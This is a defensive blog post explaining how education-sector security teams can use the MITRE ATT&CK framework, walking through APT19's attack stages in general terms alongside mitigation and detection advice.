How to use MITRE framework and APT19

A community superpower-MITRE APT19


How you can leverage a community superpower-The MITRE framework to combat cyber threats


Cybercrime is getting more serious by the month. Hackers are getting better at tricking people into clicking on fraudulent links or opening up malicious attachments in emails. Cyber attacks are becoming organised crimes. Cybercriminals are joining forces and sharing knowledge and practices. The recent ACSC threat report states that approximately one-quarter of reported cyber security incidents affected critical infrastructure organisations.

Where good versus evil, we are lucky that the good people have come together to identify the common techniques used by these attackers. This information empowers the cyber security team in any organisation with the knowledge required to block cyber attacks and detect them if they breakthrough.

In this blog post, I’ll shed some light on how to use one of the free, globally accessible services that offer comprehensive cyber security mitigation and detection information.

Cyber Security Superheroes

The group of good people are called MITRE, an American not-for-profit organisation supporting various U.S. government agencies in the defence, homeland security, and cybersecurity fields, among others. MITRE’s mission is to solve problems for a safer world. MITRE created MITRE ATT&CK®, a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations, which brings communities together to develop more effective cybersecurity.

The ATT&CK knowledge base is used as a foundation for developing specific threat models and methodologies in the private sector, in government, and the cyber security product and service community. This knowledge is used to implement controls and provision monitoring functions to prevent and detect cyber attacks.

Hereinafter, I’ll demonstrate how to use this information for one of Australia’s most cyber-attacks industries, the education industry.

How to use the MITRE Superpower

ATT&CK stands for Adversarial Tactics, Techniques, and Common Knowledge. The framework is a matrix of different cyber-attack techniques sorted by various tactics. ATT&CK defines the following tactics used in a cyberattack:

  1. Initial Access
  2. Execution
  3. Persistence
  4. Privilege Escalation
  5. Defence Evasion
  6. Credential Access
  7. Discovery
  8. Lateral Movement
  9. Collection
  10. Exfiltration
  11. Command and Control

Each tactic has multiple techniques used by hackers. MITRE provides mitigation and detection recommendations so organisations can defend against such attacks.

Ideally, each organisation should go through all the tactics and associated techniques and implement all recommendations to ensure complete protection against all possible threats. However, this can be an overwhelming process that may take a long time to complete. Hence, there is a need to prioritize implementation based on the common threats targeting their industry.

To address this, MITRE identified Threat Groups. A Threat Group is a set of related intrusion activities, tracked by a common name in the security community that may target a particular industry.

For the education industry, there are six groups identified. APT19, DarkHydrus, HAFNIUM, SilverTerrier, Tonto Team and Turla. It’s recommended that security teams in the education industry ensure they have coverage against all the techniques and tactics used by these groups.

To demonstrate this, I decided to pick the APT19 group. APT19 is a Chinese-based threat group that has targeted various industries, including education. I have then navigated to the  MITRE ATT&CK Navigator, a web-based tool for exploring ATT&CK matrices, to find the related techniques and tactics.


Then in the following section, I analysed the techniques used by APT19 to perform an attack and highlighted some of the recommendations the education sector security team need to follow to combat it. It’s recommended that the reader refers to the full materials available on MITRE website for more details, as the below sections are used for demonstration only.

APT19 Attack Analysis using MITRE ATT&CK

APT19 Step 1 – Obtaining an Initial Access to the user’s system

The first step of the attack is to gain access to the environment. The APT19 uses a technique called “Drive-by Compromise” to gain access to a user’s system through its web browser.

As part of this technique, the group identifies a website that’s frequently used by the educational industry. Then, they either hack the website and ingest a malicious code, or  place an ad with malicious code on that website through legitimate ad providers.

The malicious code is automatically executed upon visiting the website, typically searching versions of the browser and plugins for a potentially vulnerable version.

Upon finding a vulnerable version, the vulnerability is executed to deliver an exploit code to the browser and by this the adversary gets access to execute code on the user’s system remotely.

That’s why you are continuously being asked to keep your browser and its plugins up to date and ad blockers are recommended. Also, organisations utilise machine learning jobs to detect any rare and unusual URL that indicates unusual web browsing activity to a possibly compromised trusted website.

APT19 Step 2 – Executing code on the user’s system

The exploit code delivered during the initial access contains commands and scripts to execute arbitrary commands. These commands are used to establish a connection with the adversary’s command and control server enabling remote execution of commands using command-line interface and scripting capabilities such as Unix Shell, Windows Command Shell PowerShell, Python, JavaScript, Visual Basic among others.

The commands executed at this stage are targeted to achieve broader goals, like exploring a network or stealing data. However, command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. Hence, the adversary needs to worry about not being detected.

That’s why on corporate laptops the scripting is restricted for normal users and users do not have admin privileges. Also, that’s why the Network intrusion detection systems are important to detect and block remote access and connections to known command and control (c2) servers.

APT19 Step 3 – Avoid being detected

To bury any evidence, the APT19 adversary uses techniques including uninstalling/disabling security software or encrypting data and scripts among others.

One such example is to decode a remote access tool portable executable file inside a certificate file. Another example is using the Windows copy command with binary option to reassemble binary fragments into a malicious payload.

Windows registry, which contains information that Windows continually references during operation, is another place the adversary interacts with to hide configuration information and remove information as part of cleaning up.

Last but not least, the adversary may encrypt an executable or a file to make it difficult to discover.

Detecting such activities is not an easy one. That’s why the behavioural analytics offered by Endpoint Detection and Response (EDR) software is important. Refer to my previous blog post to learn more about using EDR as a 1st Line of Defence against Attacks.

APT19 Step 4 – Learn the environment

Once the APT19 adversary is able to hide the attack traces, time comes to gain knowledge about the user’s system and internal network. This happens on three levels:

System Information Discovery: To get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.

System Network Configuration Discovery: To look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access and remote systems.

System Owner/User Discovery: To identify the primary user, currently logged in user, set of users that commonly uses a system.

These types of activities cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Hence, it is important to monitor processes and command-line arguments for actions that could be taken to gather information about the environment.

At this stage the adversary is ready to cause damage not only to the user’s machine but also to the other systems connected on the same network and the organisation. The adversary will be able to steal personal information, research data and possibly send emails from legitimate accounts among other activities.

What’s next?

The above example demonstrates an attack that may happen in the education sector and how the security team in the sector can leverage the MITRE ATT&CK rich information to protect their organisations from cyberattacks.

Before it’s too late, it’s important that the education sector security team leverage the MITRE information and invest in looking at the common threats and identifying ways to protect against them. Also, it’s crucial to implement a security monitoring capability that will be on the lookout for malicious behaviour and detect if a new security technique has been used to bypass the security controls.


Author: Mouaz Alnouri